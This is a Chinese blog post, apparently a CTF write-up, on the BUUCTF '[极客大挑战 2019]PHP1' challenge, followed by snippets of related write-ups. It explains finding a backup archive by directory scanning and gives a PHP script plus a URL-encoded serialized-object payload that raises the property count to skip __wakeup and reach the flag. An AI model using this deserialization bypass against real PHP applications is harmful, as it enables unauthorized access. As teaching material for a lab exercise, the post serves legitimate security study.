反序列漏洞之[极客大挑战 2019]PHP1

最新推荐文章于 2022-10-17 18:23:56 发布
最新推荐文章于 2022-10-17 18:23:56 发布
阅读量1.6k 收藏 5
点赞数 1
分类专栏: CTF知识点 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/124050805
版权
本文介绍了如何通过PHP的序列化漏洞,绕过类的__wakeup方法,最终达到调用__destruct方法并获取flag的目标。通过修改序列化字符串中的属性数量来避开wakeup检查,构造特定的序列化输入,实现安全漏洞的利用。
摘要由CSDN通过智能技术生成

参考博文wpBUUCTF [极客大挑战 2019]PHP 1_wow小华的博客-CSDN博客

首先打开网站说他有备份;听其他师父说看到这种一般爆破目录;用dirsearch

扫,也听说这种一般都是www.zip

所以猜www.zip

打开发现真的有,下载后有几个文件,其中有用的就index.php和class.php

index.php代码:

这里面的意思就是 传进一个select,然后将select反序列化(unserialize);所以我们需要将传入的select先序列化;

class.php代码解读:

<?php
include 'flag.php';
error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function __wakeup(){
        $this->username = 'guest';
    }
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>

我们要调用到__destruct()并且password=100,username=admin才能echo $flag
怎么调用到它呢?其实不用我们动手,在反序列化脚本结束时会自动调用它,它是unserialize()结束的魔术方法(魔法函数)但首先要绕过wakeup。调用unserialize()时会自动调用魔法函数wakeup(),可以通过改变属性数绕过,把Name后面的2改为3或以上即可

 绕过wakeup方法:当成员属性数目大于实际数目时可绕过wakeup;这是反序列化的漏洞

构造序列化:

<?php
class Name
{
    private $username = "yesyesyes";
    private $password = "nonono";
    public function __construct($username,$password)
    {
        $this->username=$username;
        $this->password=$password;
    }
}
$a = new Name(@admin,100);
//var_dump($a);
//echo "<br>";
$b = serialize($a);
echo $b."<br>";//输出序列化
echo urlencode($b);//输出url编码后的序列化
?>

2.__wakeup()方法绕过

作用:
与__sleep()函数相反,__sleep()函数,是在序序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。
绕过:
当反序列化字符串,表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。
上面的代码,序列化后的结果为

O:4:"Name":2:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}
  • 1

其中name后面的2,代表类中有2个属性,但如果我们把2改成3,就会绕过__wakeup()函数。

O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}

但其中的空格“\0”和引号""URL是识别不了的,需要转换为URL编码:空格是%00," 是%22

所以构造

?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

 

一只Traveler
关注
专栏目录
21-3 PHP序列漏洞-魔术方法绕过
weixin_43263566的博客
01-17 731
启动靶场 -> 在浏览器打开链接(这个靶场平台比较良心不用花钱,有些平台按分钟收钱,时间一到靶场不续费就自动关闭)先进行进行收集,根据页面提示网站备份,我们可以通过目录探测方式找到备份文件,并根据文件进行审计等后续操作,以达到读取flag文件的目的。在PHP中,__wakeup()是一个魔术方法,用于在序列化对象时自动调用。来进行绕过,通过添加位置来改变类名的个数。或 搜索: “[极客挑战 2019]PHP”:指定排除的HTTP状态码,以逗号分隔。
[极客挑战 2019]PHP1
keaixiaohan的博客
07-23 328
进入网址之后如下: 从图片中可以看到关键字“良好备份”,应该网站有备份,/www.zip,http://84ac984d-d4e2-405c-8c84-a828e85691a6.node4.buuoj.cn/www.zip.下载压缩包,打开后有五个文件 首先打开的是flag.php,但是里面的flag是错误的,紧接着打开class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $us.
[极客挑战 2019]PHP 1
weixin_45577185的博客
06-16 398
用dirsearch-master扫描网站: 发现了www.zip,在网址后面加/www.zip,下载www.zip 然后解压发现: 挨个文件打开,发现flag.php里的flag是假的,然后发现class.php文件中: <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; pub.
BUUCTF-web [极客挑战 2019]PHP1 之 序列漏洞
yu_jing_hong的博客
12-02 2947
PHP序列漏洞 一,什么是序列序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,序列就是重新拼凑还原数据的过程。 二,PHP中的序列方法 PHP通过string serialize ( mixed $value )和mixed unserialize ( string $str )两个函数实现序列化和序列化。 序列化:serialize()将一个对象转换成一个字符串。序列化:un.
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 719
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
[BUUCTF][极客挑战 2019]PHP
朋克归零膏的博客
10-17 454
序列漏洞
[极客挑战 2019]PHP
u011250160的博客
12-12 793
提示备份文件 扫描到www.zip 解压得到 index.js文件发现 class.php文件发现 可以发现是序列漏洞 上面的检测就是username=admin,password=100才行 得到 O:4:“Name”:2:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;} 拿去提交发现 因为这个函数会在使用unserialize时自动调用 这里用到CVE-2016-7124绕过 当序列化字符串中,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值